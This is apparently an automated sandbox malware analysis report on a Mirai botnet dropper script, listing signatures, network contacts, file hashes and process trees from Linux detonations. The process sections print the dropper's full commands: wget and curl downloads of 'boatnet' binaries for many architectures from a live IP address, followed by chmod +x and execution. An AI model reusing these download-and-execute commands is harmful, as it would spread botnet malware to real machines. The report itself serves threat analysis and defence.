Malware Analysis Report

2024-11-13 17:59

Sample ID 241109-etyt7sxdrg
Target ohshit.sh
SHA256 5b35f387f69bcb231b7e339c9ddeb610fd73ebf848f8cefdcfb26a2faabc5c6f
Tags
mirai lzrd botnet defense_evasion discovery upx antivm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5b35f387f69bcb231b7e339c9ddeb610fd73ebf848f8cefdcfb26a2faabc5c6f

Threat Level: Known bad

The file ohshit.sh was found to be: Known bad.

Malicious Activity Summary

mirai lzrd botnet defense_evasion discovery upx antivm

Mirai

Mirai family

Modifies Watchdog functionality

Executes dropped EXE

File and Directory Permissions Modification

Writes file to system bin folder

Enumerates running processes

UPX packed file

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 04:14

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 04:14

Reported

2024-11-09 04:17

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

148s

Max time network

149s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/misc/watchdog /tmp/WTF N/A
File opened for modification /dev/watchdog /tmp/WTF N/A

Enumerates running processes

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1595/cmdline /tmp/WTF N/A
File opened for reading /proc/666/cmdline /tmp/WTF N/A
File opened for reading /proc/1157/cmdline /tmp/WTF N/A
File opened for reading /proc/1162/cmdline /tmp/WTF N/A
File opened for reading /proc/1569/cmdline /tmp/WTF N/A
File opened for reading /proc/1262/cmdline /tmp/WTF N/A
File opened for reading /proc/513/cmdline /tmp/WTF N/A
File opened for reading /proc/1579/cmdline /tmp/WTF N/A
File opened for reading /proc/543/cmdline /tmp/WTF N/A
File opened for reading /proc/1209/cmdline /tmp/WTF N/A
File opened for reading /proc/1364/cmdline /tmp/WTF N/A
File opened for reading /proc/462/cmdline /tmp/WTF N/A
File opened for reading /proc/1153/cmdline /tmp/WTF N/A
File opened for reading /proc/1116/cmdline /tmp/WTF N/A
File opened for reading /proc/461/cmdline /tmp/WTF N/A
File opened for reading /proc/599/cmdline /tmp/WTF N/A
File opened for reading /proc/1216/cmdline /tmp/WTF N/A
File opened for reading /proc/1593/cmdline /tmp/WTF N/A
File opened for reading /proc/749/cmdline /tmp/WTF N/A
File opened for reading /proc/1334/cmdline /tmp/WTF N/A
File opened for reading /proc/1561/cmdline /tmp/WTF N/A
File opened for reading /proc/1585/cmdline /tmp/WTF N/A
File opened for reading /proc/1401/cmdline /tmp/WTF N/A
File opened for reading /proc/1555/cmdline /tmp/WTF N/A
File opened for reading /proc/729/cmdline /tmp/WTF N/A
File opened for reading /proc/1079/cmdline /tmp/WTF N/A
File opened for reading /proc/1498/cmdline /tmp/WTF N/A
File opened for reading /proc/1045/cmdline /tmp/WTF N/A
File opened for reading /proc/1089/cmdline /tmp/WTF N/A
File opened for reading /proc/669/cmdline /tmp/WTF N/A
File opened for reading /proc/1530/cmdline /tmp/WTF N/A
File opened for reading /proc/544/cmdline /tmp/WTF N/A
File opened for reading /proc/1065/cmdline /tmp/WTF N/A
File opened for reading /proc/1107/cmdline /tmp/WTF N/A
File opened for reading /proc/1683/cmdline /tmp/WTF N/A
File opened for reading /proc/1190/cmdline /tmp/WTF N/A
File opened for reading /proc/1083/cmdline /tmp/WTF N/A
File opened for reading /proc/1086/cmdline /tmp/WTF N/A
File opened for reading /proc/1306/cmdline /tmp/WTF N/A
File opened for reading /proc/447/cmdline /tmp/WTF N/A
File opened for reading /proc/463/cmdline /tmp/WTF N/A
File opened for reading /proc/1571/cmdline /tmp/WTF N/A
File opened for reading /proc/1035/cmdline /tmp/WTF N/A
File opened for reading /proc/1280/cmdline /tmp/WTF N/A
File opened for reading /proc/975/cmdline /tmp/WTF N/A
File opened for reading /proc/1096/cmdline /tmp/WTF N/A
File opened for reading /proc/761/cmdline /tmp/WTF N/A
File opened for reading /proc/1166/cmdline /tmp/WTF N/A
File opened for reading /proc/1187/cmdline /tmp/WTF N/A
File opened for reading /proc/1553/cmdline /tmp/WTF N/A
File opened for reading /proc/980/cmdline /tmp/WTF N/A
File opened for reading /proc/1547/cmdline /tmp/WTF N/A
File opened for reading /proc/580/cmdline /tmp/WTF N/A
File opened for reading /proc/1661/cmdline /tmp/WTF N/A
File opened for reading /proc/1603/cmdline /tmp/WTF N/A
File opened for reading /proc/1563/cmdline /tmp/WTF N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.mpsl /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm /usr/bin/curl N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.spc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mips /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.spc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.sh4 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mips /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i468 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i686 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.sh4 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/WTF /tmp/ohshit.sh N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm /usr/bin/wget N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]

/bin/chmod

[chmod +x boatnet.mips boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]

/bin/chmod

[chmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm6]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm7]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-mAhB1J systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.ppc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.spc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-EdkoHW systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.m68k]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.sh4]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]

/tmp/WTF

[./WTF]

Network

Country Destination Domain Proto
GB 77.221.151.63:80 77.221.151.63 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
GB 77.221.151.63:3778 tcp
GB 195.181.164.14:443 tcp

Files

/tmp/boatnet.x86

MD5 895badd48eed0c0e0ba14e8d5967e7bb
SHA1 3c4c22665e6197841f7e68f941a4a27dca3d4d8d
SHA256 e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4
SHA512 dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 04:14

Reported

2024-11-09 04:17

Platform

debian9-armhf-20240418-en

Max time kernel

139s

Max time network

144s

Command Line

[/tmp/ohshit.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WTF /tmp/WTF N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/WTF N/A
File opened for modification /dev/misc/watchdog /tmp/WTF N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/watchdog /tmp/WTF N/A
File opened for modification /bin/watchdog /tmp/WTF N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/636/cmdline /tmp/WTF N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/588/cmdline /tmp/WTF N/A
File opened for reading /proc/852/cmdline /tmp/WTF N/A
File opened for reading /proc/862/cmdline /tmp/WTF N/A
File opened for reading /proc/822/cmdline /tmp/WTF N/A
File opened for reading /proc/809/cmdline /tmp/WTF N/A
File opened for reading /proc/858/cmdline /tmp/WTF N/A
File opened for reading /proc/639/cmdline /tmp/WTF N/A
File opened for reading /proc/767/cmdline /tmp/WTF N/A
File opened for reading /proc/848/cmdline /tmp/WTF N/A
File opened for reading /proc/586/cmdline /tmp/WTF N/A
File opened for reading /proc/644/cmdline /tmp/WTF N/A
File opened for reading /proc/830/cmdline /tmp/WTF N/A
File opened for reading /proc/856/cmdline /tmp/WTF N/A
File opened for reading /proc/631/cmdline /tmp/WTF N/A
File opened for reading /proc/829/cmdline /tmp/WTF N/A
File opened for reading /proc/846/cmdline /tmp/WTF N/A
File opened for reading /proc/self/exe /tmp/WTF N/A
File opened for reading /proc/573/cmdline /tmp/WTF N/A
File opened for reading /proc/637/cmdline /tmp/WTF N/A
File opened for reading /proc/854/cmdline /tmp/WTF N/A
File opened for reading /proc/638/cmdline /tmp/WTF N/A
File opened for reading /proc/673/cmdline /tmp/WTF N/A
File opened for reading /proc/816/cmdline /tmp/WTF N/A
File opened for reading /proc/807/cmdline /tmp/WTF N/A
File opened for reading /proc/850/cmdline /tmp/WTF N/A
File opened for reading /proc/844/cmdline /tmp/WTF N/A
File opened for reading /proc/594/cmdline /tmp/WTF N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/boatnet.arc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.i686 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.sh4 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/curl N/A
File opened for modification /tmp/boatnet.spc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm /usr/bin/wget N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/curl N/A
File opened for modification /tmp/WTF /tmp/ohshit.sh N/A
File opened for modification /tmp/boatnet.i468 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mips /usr/bin/wget N/A
File opened for modification /tmp/boatnet.ppc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.spc /usr/bin/curl N/A
File opened for modification /tmp/boatnet.x86 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm5 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.m68k /usr/bin/wget N/A
File opened for modification /tmp/boatnet.sh4 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.mips /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arc /usr/bin/wget N/A
File opened for modification /tmp/boatnet.mpsl /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm6 /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/wget N/A
File opened for modification /tmp/boatnet.arm /usr/bin/curl N/A
File opened for modification /tmp/boatnet.arm7 /usr/bin/curl N/A

Processes

/tmp/ohshit.sh

[/tmp/ohshit.sh]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.x86]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]

/bin/cat

[cat boatnet.x86]

/bin/chmod

[chmod +x boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.mips]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]

/bin/cat

[cat boatnet.mips]

/bin/chmod

[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arc]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]

/bin/cat

[cat boatnet.arc]

/bin/chmod

[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.i468]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]

/bin/cat

[cat boatnet.i468]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.i686]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]

/bin/cat

[cat boatnet.i686]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]

/bin/cat

[cat boatnet.x86_64]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]

/bin/cat

[cat boatnet.mpsl]

/bin/chmod

[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]

/bin/cat

[cat boatnet.arm]

/bin/chmod

[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-0de7d7b1eb1d4c3cacb13d23d5e782d3-systemd-timedated.service-ALpyDX WTF]

/tmp/WTF

[./WTF]

/usr/bin/wget

[wget http://77.221.151.63/hiddenbin/boatnet.arm5]

/usr/bin/curl

[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]

/bin/cat

[cat boatnet.arm5]

